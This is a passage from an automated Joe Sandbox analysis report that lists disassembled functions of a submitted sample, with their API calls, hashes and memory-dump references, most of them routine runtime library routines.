                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                                                                                    • Opcode ID: 75f8d3f29dc35a33b7cb129e37605344eff945c5aa3ecc483401af6c572f5c4d
                                                                                                                                                                                                    • Instruction ID: eeae13f2af2646b70a5bc11644924ce57acaafdf14fb235e4adf7df805500ef9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75f8d3f29dc35a33b7cb129e37605344eff945c5aa3ecc483401af6c572f5c4d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E04F76800128ABDB11ABA4DC09FDB7BACFF0A3D1F040065B649E2004DAB4DA84CBB0
                                                                                                                                                                                                    Function 0088A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0088A3DA
                                                                                                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0088A3E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1918208029-0
                                                                                                                                                                                                    • Opcode ID: b1c81fcac320c3061ce66bc407017af3c99926c3e67e6502646f195873617440
                                                                                                                                                                                                    • Instruction ID: 2d71e0f086d93930a4d533cace9221fe1a94c066163cc79b524d69fa01e35e6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1c81fcac320c3061ce66bc407017af3c99926c3e67e6502646f195873617440
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E0ED71500218EBDB54EF99C5416A9BBE8FB05364F10805AA846E3741E3B4AE04DB92
                                                                                                                                                                                                    Function 00892B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00892BAA
                                                                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00892BB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1660781231-0
                                                                                                                                                                                                    • Opcode ID: 2f20c7be89533fe01e6d199f2485520f43496a2400bc520db22860196b8613b4
                                                                                                                                                                                                    • Instruction ID: 6af7b00ea0f046bd0ce80c376f7aca8636defa27fbd03655c2735872e3f1b587
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f20c7be89533fe01e6d199f2485520f43496a2400bc520db22860196b8613b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CD02235558700B85C147E78281345833C5FEA2B79BAC47CAF030C5AC1EE148440E013
                                                                                                                                                                                                    Function 008712F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemShowWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3351165006-0
                                                                                                                                                                                                    • Opcode ID: d4bd713a5ae9938c76f18f6b8fba498fbbc8ee1df2472df3d5007004b16fb0d0
                                                                                                                                                                                                    • Instruction ID: a016eba16de77d794524c28af1d27cc70887604f2177cea631ee6c9d4eaff8c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4bd713a5ae9938c76f18f6b8fba498fbbc8ee1df2472df3d5007004b16fb0d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33C0123205C202BECF021BB4DC09C2BBBA8BBA6312F04CA0AB0A5C0060C238C210DB12
                                                                                                                                                                                                    Function 00871A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 2553c146421d09d246fe1b1e085a6f191c7db58d164fb625233131ae3a5f6b43
                                                                                                                                                                                                    • Instruction ID: 429ba8adb9c812e090cd16b59592b6c9ec1e97cd968a5a16cdfd4b2eca455492
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2553c146421d09d246fe1b1e085a6f191c7db58d164fb625233131ae3a5f6b43
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BC18330A002549FEF25CF6CC498BA97BA5FF55310F1881B9EC49DBA9ADB30D944CB61
                                                                                                                                                                                                    Function 00873BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: f5580cf345b5695b8b229408d3f899b364ba85342636cbe2414ff26099c9a42b
                                                                                                                                                                                                    • Instruction ID: edb40a9151009a50b4a0b52f436b93f1579e07696d7cab14f49444501a427480
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5580cf345b5695b8b229408d3f899b364ba85342636cbe2414ff26099c9a42b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B271A071500B449EDB35EB78C8559E7B7E9FB14300F40892EE1AFC7645DA32A684EF12
                                                                                                                                                                                                    Function 00878284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00878289
                                                                                                                                                                                                      • Part of subcall function 008713DC: __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                      • Part of subcall function 0087A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0087A598
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2506663941-0
                                                                                                                                                                                                    • Opcode ID: 4e1d9ac27d1b4eb3c89a17f2e60a0982861c31a362bc4b424462cea2d8a724e1
                                                                                                                                                                                                    • Instruction ID: dfa4815d2eeae0b80e4ab866e9f5908589a07ad98073fcf131cb168f708d7a7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e1d9ac27d1b4eb3c89a17f2e60a0982861c31a362bc4b424462cea2d8a724e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9341C9719446589ADB20EB68CC59AE9B368FF00304F4484EAE08EE7197EB759EC4CB51
                                                                                                                                                                                                    Function 008713E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                      • Part of subcall function 00875E37: __EH_prolog.LIBCMT ref: 00875E3C
                                                                                                                                                                                                      • Part of subcall function 0087CE40: __EH_prolog.LIBCMT ref: 0087CE45
                                                                                                                                                                                                      • Part of subcall function 0087B505: __EH_prolog.LIBCMT ref: 0087B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: c1d904bae82b0f11b403a2e3747e63b0ce8af19e3f69a19b0200f4b233bd5837
                                                                                                                                                                                                    • Instruction ID: 3803b1f61a2e69a1879eb7e5b8ee20755c375fb9b60ced5ad8334c6b0b52f13c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1d904bae82b0f11b403a2e3747e63b0ce8af19e3f69a19b0200f4b233bd5837
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 174146B0905B409AE724DF3D8885AE6FAE5FF19310F54492EE5EEC3282CB316654CB11
                                                                                                                                                                                                    Function 008713DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                      • Part of subcall function 00875E37: __EH_prolog.LIBCMT ref: 00875E3C
                                                                                                                                                                                                      • Part of subcall function 0087CE40: __EH_prolog.LIBCMT ref: 0087CE45
                                                                                                                                                                                                      • Part of subcall function 0087B505: __EH_prolog.LIBCMT ref: 0087B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 506b81ee529606d01cb632ffb15ba1acac9278d92c5086886bd54842f75c7d22
                                                                                                                                                                                                    • Instruction ID: 6f297627a2d4e30a9cb743da77e230d89e99322c8df6e0f2851c64742b60551a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 506b81ee529606d01cb632ffb15ba1acac9278d92c5086886bd54842f75c7d22
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC4146B0905B409AE724DF7D8885AE6FAE5FF19310F54492ED6EEC3282CB316654CB11
                                                                                                                                                                                                    Function 0088359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 470875ab59cf66812c7f544277f384db4f11f0954ec5b4851f766215cfaecc7f
                                                                                                                                                                                                    • Instruction ID: 1f30deb5d9eaf98e3f0e0ab9eb578fb189c26fe9068d07bbd969a0a2442643cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 470875ab59cf66812c7f544277f384db4f11f0954ec5b4851f766215cfaecc7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B121E4B1E40216ABDB14EF7CCC4566A76A8FF18714F14013AA606EA781E7749A00C7A9
                                                                                                                                                                                                    Function 0088B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0088B098
                                                                                                                                                                                                      • Part of subcall function 008713DC: __EH_prolog.LIBCMT ref: 008713E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: d889323a6fe18ee9f05797140923c2e967c3b8846338e505cbf1f25720c66f25
                                                                                                                                                                                                    • Instruction ID: 7bbad3cc3af2853f0fa5c4f90e241f634c100891f83ed6ad685e2e3de41a220c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d889323a6fe18ee9f05797140923c2e967c3b8846338e505cbf1f25720c66f25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A318A75814249EACF15EFA8C8559EEBBB4FF59304F10449EE409F7242DB35AE04CBA2
                                                                                                                                                                                                    Function 0089AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0089ACF8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: 1443176cf0baa04679802ab9b5d5ed41009b9b020fa2710de75ec0feb6c9ecc3
                                                                                                                                                                                                    • Instruction ID: 22ef03837091b67a46cf4d05e3d5848b4b58de1439e34b58ef2de618211812c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1443176cf0baa04679802ab9b5d5ed41009b9b020fa2710de75ec0feb6c9ecc3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE11A333A006256FAF2AAE28EC4095A7395FB8536971E4620FD15EB654D730DC01C7D2
                                                                                                                                                                                                    Function 00879215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 0486d031bbaec7b43b0f54753f6894bca1e51462bd4c2c0295a4afef0df37099
                                                                                                                                                                                                    • Instruction ID: 23cdee8ecad9ebbd6d0fd4212657c05bbddc0eb3e8e8288bebe1394e0fd6b1f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0486d031bbaec7b43b0f54753f6894bca1e51462bd4c2c0295a4afef0df37099
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10015633910528ABCF12FBACCC819DEB735FF88750B018565E869F7256DA34CD04C6A1
                                                                                                                                                                                                    Function 0088DA52 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0088DA57
                                                                                                                                                                                                      • Part of subcall function 00880659: _wcslen.LIBCMT ref: 0088066F
                                                                                                                                                                                                      • Part of subcall function 00877B0D: __EH_prolog.LIBCMT ref: 00877B12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2838827086-0
                                                                                                                                                                                                    • Opcode ID: 17f1c07b14f19664b9e60e24b7be5a130b47b06cbe4c5239c70fcf67214d3a33
                                                                                                                                                                                                    • Instruction ID: 5712a26dc39df7b1f137964a83c4f78920a0d243472a362991a9b61cca3b4007
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f1c07b14f19664b9e60e24b7be5a130b47b06cbe4c5239c70fcf67214d3a33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A11EB71508244EED711EB9CA816FDC7BB4FB25310F0081AEF254D2392DBB55654CB62
                                                                                                                                                                                                    Function 0089C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0089B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00899813,00000001,00000364,?,008940EF,?,?,008B1098), ref: 0089B177
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C4E5
                                                                                                                                                                                                    Memory Dump Source
